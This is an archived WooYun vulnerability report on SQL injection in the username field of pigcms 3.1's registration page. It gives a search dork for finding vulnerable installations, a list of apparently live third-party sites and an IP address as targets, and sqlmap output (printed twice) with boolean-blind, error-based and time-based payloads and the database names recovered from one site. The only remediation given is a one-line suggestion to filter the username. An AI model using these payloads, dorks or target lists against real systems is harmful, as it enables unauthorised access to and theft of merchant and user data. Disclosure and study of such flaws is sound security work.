乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-05: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-03-05: 厂商已经主动忽略漏洞,细节向公众公开
pigcms3.1 用户注册处注入漏洞
WooYun: 某通用型微信公众平台SQL注入(泄露上万商家信息)
关键词:inurl:index.php?g=Home&m=Index&a=help
相关案例:http://www.fifee.com/http://lierk.cn/index.php?m=Index&a=login+http://a.t2.weixinbiz.cn/index.php?m=Index&a=reghttp://114.215.185.138/index.php?m=Users&a=checkloginhttp://wechat.lx1999.com.cn/index.php?m=Users&a=checkloginhttp://www.jpsbzr.com/index.php?m=Index&a=loginhttp://www.iweichat.com/index.php?m=Index&a=loginhttp://166u.cn/http://wx.lefangw.cn/index.php?g=Home&m=Index&a=help
#1演示站点:用户注册
http://wechat.lx1999.com.cn/index.php?m=Index&a=login
然后抓包,username参数为过滤,可以注入,单引号已经带入进去咯
这里直接丢进sqlmap里面跑吧~
---Place: POSTParameter: username Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: username=synack') RLIKE (SELECT (CASE WHEN (8978=8978) THEN 0x73796e61636b ELSE 0x28 END)) AND ('IRPc'='IRPc&password=synack&repassword=synack&mp=13585001213&[email protected]&invitecode=&__hash__=3e9fde7441cc55bf46afe7f8361af205_55b6754b5cf7bfbacb68f0eda1ff0b9a Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: username=synack') AND (SELECT 6837 FROM(SELECT COUNT(*),CONCAT(0x716f796471,(SELECT (CASE WHEN (6837=6837) THEN 1 ELSE 0 END)),0x7165736d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BXpm'='BXpm&password=synack&repassword=synack&mp=13585001213&[email protected]&invitecode=&__hash__=3e9fde7441cc55bf46afe7f8361af205_55b6754b5cf7bfbacb68f0eda1ff0b9a Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: username=synack') AND SLEEP(5) AND ('CIZJ'='CIZJ&password=synack&repassword=synack&mp=13585001213&[email protected]&invitecode=&__hash__=3e9fde7441cc55bf46afe7f8361af205_55b6754b5cf7bfbacb68f0eda1ff0b9a---web application technology: Apacheback-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: username Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: username=synack') RLIKE (SELECT (CASE WHEN (8978=8978) THEN 0x73796e61636b ELSE 0x28 END)) AND ('IRPc'='IRPc&password=synack&repassword=synack&mp=13585001213&[email protected]&invitecode=&__hash__=3e9fde7441cc55bf46afe7f8361af205_55b6754b5cf7bfbacb68f0eda1ff0b9a Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: username=synack') AND (SELECT 6837 FROM(SELECT COUNT(*),CONCAT(0x716f796471,(SELECT (CASE WHEN (6837=6837) THEN 1 ELSE 0 END)),0x7165736d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BXpm'='BXpm&password=synack&repassword=synack&mp=13585001213&[email protected]&invitecode=&__hash__=3e9fde7441cc55bf46afe7f8361af205_55b6754b5cf7bfbacb68f0eda1ff0b9a Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: username=synack') AND SLEEP(5) AND ('CIZJ'='CIZJ&password=synack&repassword=synack&mp=13585001213&[email protected]&invitecode=&__hash__=3e9fde7441cc55bf46afe7f8361af205_55b6754b5cf7bfbacb68f0eda1ff0b9a---web application technology: Apacheback-end DBMS: MySQL 5.0available databases [5]:[*] information_schema[*] mysql[*] start[*] weixine[*] weixintest
过滤一下username
未能联系到厂商或者厂商积极拒绝